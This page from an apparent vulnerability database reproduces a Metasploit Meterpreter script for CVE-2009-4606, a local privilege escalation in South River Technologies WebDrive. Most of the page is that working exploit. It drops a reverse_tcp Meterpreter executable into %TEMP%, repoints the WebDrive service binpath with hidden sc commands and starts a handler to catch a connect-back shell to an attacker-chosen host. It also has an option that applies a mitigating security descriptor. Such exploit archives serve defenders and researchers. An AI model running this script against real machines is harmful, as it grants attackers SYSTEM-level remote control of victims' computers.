Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 20 Views

South River Technologies WebDrive local privilege escalatio

Code

                                                ##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
#  This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. 
#  Due to an empty security descriptor, a local attacker can gain elevated privileges.
#  Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
#  Vulnerability mitigation featured.
#
#  Credit:
#   - Discovery			- Nine:Situations:Group::bellick
#   - Meterpreter script	- Trancer
#
#  References:
#   - http://retrogod.altervista.org/9sg_south_river_priv.html
#   - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
#   - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
#   - http://osvdb.org/show/osvdb/59080
#
#  mtrancer[@]gmail.com
#  http://www.rec-sec.com
##

#
# Options
#
opts = Rex::Parser::Arguments.new(
	"-h"  => [ false,  "This help menu"],
	"-m"  => [ false,  "Mitigate"],
	"-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
	"-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
)

#
# Default parameters
#

rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
	case opt
	when "-h"
		print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
		print_line(opts.usage)
		raise Rex::Script::Completed
	when "-m"
		client.sys.process.get_processes().each do |m|
			if ( m['name'] == pname )
				print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
				
				# Set correct service security descriptor to mitigate the vulnerability
				print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
				client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
			end
		end
		raise Rex::Script::Completed
	when "-r"
		rhost = val
	when "-p"
		rport = val.to_i
	end
end

client.sys.process.get_processes().each do |m|
	if ( m['name'] == pname )

		print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")

		# Build out the exe payload.
		pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
		pay.datastore['LHOST'] = rhost
		pay.datastore['LPORT'] = rport
		raw  = pay.generate

		exe = Msf::Util::EXE.to_win32pe(client.framework, raw)

		# Place our newly created exe in %TEMP%
		tempdir = client.fs.file.expand_path("%TEMP%")
		tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
		print_status("Sending EXE payload '#{tempexe}'.")
		fd = client.fs.file.new(tempexe, "wb")
		fd.write(exe)
		fd.close

		# Stop the vulnerable service
		print_status("Stopping service \"#{sname}\"...")
		client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})

		# Set exe payload as service binpath
		print_status("Setting \"#{sname}\" to #{tempexe}...")
		client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
		sleep(1)
		
		# Restart the service
		print_status("Restarting the \"#{sname}\" service...")
		client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})

		# Our handler to recieve the callback.
		handler = client.framework.exploits.create("multi/handler")
		handler.datastore['PAYLOAD'] 		= "windows/meterpreter/reverse_tcp"
		handler.datastore['LHOST']   		= rhost
		handler.datastore['LPORT']   		= rport
		handler.datastore['ExitOnSession'] 	= false

		handler.exploit_simple(
			'Payload'	=> handler.datastore['PAYLOAD'],
			'RunAsJob'	=> true
		)

		# Set service binpath back to normal
		client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
			
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
south river technologies webdrivelocal privilege escalationvulnerability mitigationwindows xp sp3nine:situations:group::bellicktrancerretrogodrec-seccve-2009-4606osvdb-59080
20